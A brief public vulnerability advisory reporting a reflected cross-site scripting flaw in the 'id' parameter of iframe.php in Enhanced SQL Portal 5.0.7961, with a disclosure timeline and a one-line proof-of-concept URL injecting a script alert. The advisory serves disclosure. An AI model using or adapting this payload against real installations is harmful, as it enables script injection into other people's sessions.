[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt Vendor: www.eliacom.com www.eliacom.com/mysql-gui-download.php Product: Enhanced SQL Portal 5.0.7961 web based MySQL administration application. Advisory Information: ================================================ Enhanced SQL Portal 5.0.7961 XSS Vulnerability Vulnerability Details: ===================== iframe.php contains an XSS vulnerability Exploit code(s): =============== http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/><script>alert(666)</script> Disclosure Timeline: ========================================================= Vendor Notification: May 28, 2015 June 2, 2015 : Public Disclosure Severity Level: ========================================================= Med Description: ========================================================== Request Method(s): [+] GET Vulnerable Product: [+] Enhanced SQL Portal 5.0.7961 Vulnerable Parameter(s): [+] id Affected Area(s): [+] iframe =============================================================== (hyp3rlinx)
